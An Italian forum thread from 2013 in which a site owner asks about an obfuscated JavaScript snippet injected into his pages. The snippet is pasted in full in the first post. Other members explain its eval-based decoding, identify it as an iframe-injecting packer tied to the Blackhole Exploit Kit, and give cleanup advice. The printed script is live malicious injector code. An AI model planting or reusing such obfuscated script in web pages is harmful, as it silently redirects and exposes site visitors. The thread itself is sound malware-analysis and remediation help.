Telefonino.net network
 
| HOMEPAGE | INDICE FORUM | REGOLAMENTO | ::. NEI PREFERITI .:: | RSS Forum | RSS News | NEWS web | NEWS software |
| PUBBLICITA' | | ARTICOLI | WIN XP | VISTA | WIN 7 | REGISTRI | SOFTWARE | MANUALI | RECENSIONI | LINUX | HUMOR | HARDWARE | DOWNLOAD | | CERCA nel FORUM » |

Torna indietro   WinTricks Forum > Software > Programmazione

Notices

Rispondi
 
Strumenti discussione
Vecchio 27-01-2013, 20.33.42   #1
bepi
Junior Member
 
Registrato: 28-02-2007
Messaggi: 193
bepi promette bene
Cos’è questo strano codice ?

Salve,
ho costruito un piccolo sito in HTML su hosting free, in alcune pagine ci trovo questo strano codice che qualcuno aggiunge forse il gestore dell’hosting.
<script type="text/javascript" language="javascript" > ww=window;v="v"+"al";if(ww.document)try{document.b ody=12;}catch(gdsgsdg){asd=0;try{q=document.create Element("div");}catch(q){asd=1;}if(!asd){w={a:ww}. a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,3 2,122,11,7,32,31,30,29,118,96,112,29,105,118,100,1 05,115,31,59,29,100,110,97,114,109,100,108,113,46, 98,112,98,97,115,99,66,108,100,107,98,110,115,38,3 6,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30 ,29,32,104,117,99,108,114,44,112,114,98,30,58,32,3 8,102,113,116,111,56,44,47,118,117,116,46,104,98,1 06,101,107,99,113,116,113,109,107,105,98,95,43,105 ,115,45,103,115,46,97,108,117,109,114,98,114,45,11 0,101,112,38,57,10,10,31,30,29,32,104,117,99,108,1 14,44,112,116,120,106,98,46,111,109,112,105,115,10 3,108,110,31,59,29,39,96,96,112,111,107,115,113,10 1,38,57,10,10,31,30,29,32,104,117,99,108,114,44,11 2,116,120,106,98,46,97,109,111,100,100,112,29,61,3 1,37,45,39,58,11,7,32,31,30,29,105,118,100,105,115 ,45,113,113,121,107,99,43,104,100,103,100,104,115, 30,58,32,38,47,109,120,38,57,10,10,31,30,29,32,104 ,117,99,108,114,44,112,116,120,106,98,46,118,103,9 7,116,103,30,58,32,38,47,109,120,38,57,10,10,31,30 ,29,32,104,117,99,108,114,44,112,116,120,106,98,46 ,107,99,99,116,31,59,29,39,48,110,117,39,58,11,7,3 2,31,30,29,105,118,100,105,115,45,113,113,121,107, 99,43,116,110,110,29,61,31,37,46,112,119,37,56,13, 9,11,7,32,31,30,29,105,101,30,37,33,99,109,96,117, 108,99,107,116,45,101,98,116,68,106,98,109,100,108 ,113,66,120,71,97,40,38,103,116,102,107,113,36,41, 40,30,120,13,9,30,29,32,31,30,29,32,31,98,108,99,1 16,107,98,110,115,44,116,114,104,114,98,40,38,58,9 7,105,117,30,102,100,60,90,36,105,118,100,105,115, 91,37,59,60,46,98,102,118,61,37,38,59,12,8,29,32,3 1,30,29,32,31,30,97,111,98,115,106,101,109,114,43, 103,100,114,66,108,100,107,98,110,115,64,118,73,99 ,38,36,105,118,100,105,115,38,39,43,97,111,110,98, 110,99,65,101,105,107,98,37,105,118,100,105,115,40 ,57,10,10,31,30,29,32,124,11,7,125,40,38,38,59);}w =f;s=[];for(i=0;-i+505!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String. fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd) {xz(s)}</script><!--/b5bee1-->

A volte Avast lo rileva

Cosa sarà ?

Grazie dell’attenzione.
bepi non è collegato   Rispondi citando
Vecchio 28-01-2013, 12.30.09   #2
LoryOne
Gold Member
WT Expert
 
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
LoryOne è un gioiello raroLoryOne è un gioiello raroLoryOne è un gioiello raro
Rif: Cos’è questo strano codice ?

E' quasi sicuramente uno script il cui codice NON vuole essere trasparente all'utente. L'array contiene una sequenza di codici ASCII apparentemente senza senso, ma che lo acquisiscono attraverso un algoritmo appositamente predisposto. La stringa equivalente viene ricavata dal codice
Codice:
for(...){
s=s+String.fromCharCode((1*w[j]+e("j%4")))
}
poi data in pasto a JavaScript attraverso la chiamata alla funzione xz.
Il codice può non essere nocivo, non è detto sia un malware, ma certamente nascosto; Potrebbe essere invadente oltre misura, ossia inutile al fine che il sito che si prefigge.
Purtroppo è pratica comune su tutti i fronti.

ps: Perchè AVAST lo rileva ?
Perchè con ogni probabilità, AVAST non esegue per conto del browser quell'algoritmo (non è così evoluto, è l'intelligenza umana a superare quella della macchina, notoriamente meccanica e priva di fantasia), ricavando il codice contenuto in 's' prima che il browser lo esegua, bensì rileva una chiamata ad una o più API di sistema da parte del motore JS ritenuta pericolosa.

Per tale motivo (principalmente), o si evita di eseguire lo script e/o gli oggetti ad esso legati (vedi NoScript), oppure si esegue il browser in un ambiente virtualizzato che ha ragione di esistere fino a quando il browser è attivo e non intacca l'ambiente entro il quale opera il S.O.
LoryOne non è collegato   Rispondi citando
Vecchio 29-01-2013, 22.17.44   #3
bepi
Junior Member
 
Registrato: 28-02-2007
Messaggi: 193
bepi promette bene
Rif: Cos’è questo strano codice ?

Chiarissimo, ho imparato ancora.
Grazie
bepi non è collegato   Rispondi citando
Vecchio 06-06-2013, 19.13.47   #4
Predator75
Newbie
 
L'avatar di Predator75
 
Registrato: 06-06-2013
Messaggi: 4
Predator75 promette bene
Rif: Cos’è questo strano codice ?

se tu hai fatto il sito, teoricamente dovresti sapere per quale motivo c'è tale codice.
Sinceramente è a me risulta essere un malware, Blackhole Exploit Kit.
Predator75 non è collegato   Rispondi citando
Vecchio 06-06-2013, 19.58.12   #5
Predator75
Newbie
 
L'avatar di Predator75
 
Registrato: 06-06-2013
Messaggi: 4
Predator75 promette bene
Rif: Cos’è questo strano codice ?

confermo i miei sospetti.
in qualità di reverser mi son incuriosito e preso la briga di decrittografare quello script.
in effetti si tratta di un packer javascript il quale esegue del codice che va a sua volta a scrivere nella pagina creando un iframe injection che apre connessioni verso http://cel-design.com/test/dtd.php (url che al momento non esiste più).
detto in una parola, è un malware.

se ne hai bisogno scrivo un programma che ti pulisce dal malware... ma attenzione se è entrato quel coso significa che il tuo sito è vulnerabile!

Predator
Predator75 non è collegato   Rispondi citando
Vecchio 07-06-2013, 10.19.56   #6
LoryOne
Gold Member
WT Expert
 
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
LoryOne è un gioiello raroLoryOne è un gioiello raroLoryOne è un gioiello raro
Rif: Cos’è questo strano codice ?

Grande Predator75, hai sicuramente fatto un ottimo lavoro.
Il fatto che AVAST abbia rilevato il malware è perchè ha tenuto sotto controllo il link contenuto nel frame rielaborato dal browser, ed identificato il malware da te segnalato presso quel link, probabilmente prima che avvenisse il download in locale.
Il problema, adesso, non è tanto fornire a bepi il tool di rimozione del malware (se AVAST ha bloccato l'accesso, il suo PC non è infetto...forse ha infettato altri utenti privi di antivirus che si sono connessi allo stesso sito ?), quanto segnalare al gestore dell'hosting che è lui ad avere i server compromessi.

ps: Suggerisco che debba essere bepi a segnalare al gestore il fatto.
Inoltre, considera che bepi ha esplicitamente affermato che quello è codice aggiunto da qualcuno, non da lui stesso.
Il perchè sia presente quel codice, deve essere chiaro ad entrambi
LoryOne non è collegato   Rispondi citando
Vecchio 07-06-2013, 10.45.24   #7
Predator75
Newbie
 
L'avatar di Predator75
 
Registrato: 06-06-2013
Messaggi: 4
Predator75 promette bene
Rif: Cos’è questo strano codice ?

Grazie LoryOne,
concordo il problema potrebbe gravare non tanto sul sito, ma sul server.
A livello di utenza non c'è problema, quel codice non può infettare un browser in nessun modo, genera solo traffico non voluto ad ogni apertura di pagina. Inoltre i browser nuovi utilizzano sandbox ed è difficilissimo infettarli.
Tra l'altro incredibile coincidenza ieri, dopo che ho letto questo topic, un mio collaboratore mi ha contattato perchè ha il sito di un suo cliente infettato dallo stesso malware!
Oggi se ho un attimo di tempo pubblico il sorgente e l'exe cosi' da poter ripulire automaticamente tutte le pagine dal codice malevolo.
Predator75 non è collegato   Rispondi citando
Vecchio 07-06-2013, 11.03.22   #8
LoryOne
Gold Member
WT Expert
 
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
LoryOne è un gioiello raroLoryOne è un gioiello raroLoryOne è un gioiello raro
Rif: Cos’è questo strano codice ?

Grazie a te Predator75.
Per quanto riguarda l'exe, non so se gli admin di questo forum lo renderanno pubblico a lungo, ma il sorgente è sempre ben accetto.
Ad ogni modo, continuo a suggerire che sia necessario verificare la compromissione dei server, anche perchè, come già evidenziato da bepi, alla pagina viene aggiunto codice non esplicitamente immesso dal webmaster del sito ospitato.
LoryOne non è collegato   Rispondi citando
Vecchio 07-06-2013, 16.47.48   #9
Predator75
Newbie
 
L'avatar di Predator75
 
Registrato: 06-06-2013
Messaggi: 4
Predator75 promette bene
Rif: Cos’è questo strano codice ?

Condivido il tool di rimozione,
https://www.dropbox.com/s/c424wt2e0h...emover_SCR.rar
sorgente ed eseguibile compilato per coloro che non sono programmatori.
LoryOne, se googli un attimo il mio nick associato all'argomento del reversing, vedi che sono una persiona seria, non ho mai fatto cavolate con tool, anzi sempre reversato malware per scoprirne i responsabili
Concettualmente il tool è molto semplice, tramite delle regex filtra il contenuto del malware e ri-salva la pagina pulita.
Bepi mi raccomando fai il backup prima di sovrascrivere le pagine, non si sa mai!!! e scopri dove è la falla nel sito, presto potrebbe entrare qualcosa di davvero dannoso.
Ciao

Predator
Predator75 non è collegato   Rispondi citando
Rispondi


Utenti attualmente attivi che stanno leggendo questa discussione: 1 (0 utenti e 1 ospiti)
 
Strumenti discussione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is ON
Gli smilies sono ON
[IMG] è ON
Il codice HTML è OFF

Vai al forum

Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
[javascript] memorizzare selezioni di un campo select di un modulo bietolino Programmazione 4 14-05-2007 12.05.02
Genuine intel (R) CPU T2060 @ 1.60GHz? smithcome Hardware e Overclock 68 08-03-2007 19.33.02
Impossibile Caricare il drive di periferica per questo Hardware (codice 39) input Hardware e Overclock 2 18-10-2006 17.40.49
Euroscettico Billow Chiacchiere in libertà 75 17-12-2004 17.57.42
Aiuto x Drive Image 7 SONOTRANOI Software applicativo 10 13-11-2004 03.13.11

Orario GMT +2. Ora sono le: 15.56.11.


E' vietata la riproduzione, anche solo in parte, di contenuti e grafica.
Copyright © 1999-2017 Edizioni Master S.p.A. p.iva: 02105820787 • Tutti i diritti sono riservati
L'editore NON si assume nessuna responsabilità dei contenuti pubblicati sul forum in quanto redatti direttamente dagli utenti.
Questi ultimi sono responsabili dei contenuti da loro riportati nelle discussioni del forum
Powered by vBulletin - 2010 Copyright © Jelsoft Enterprises Limited.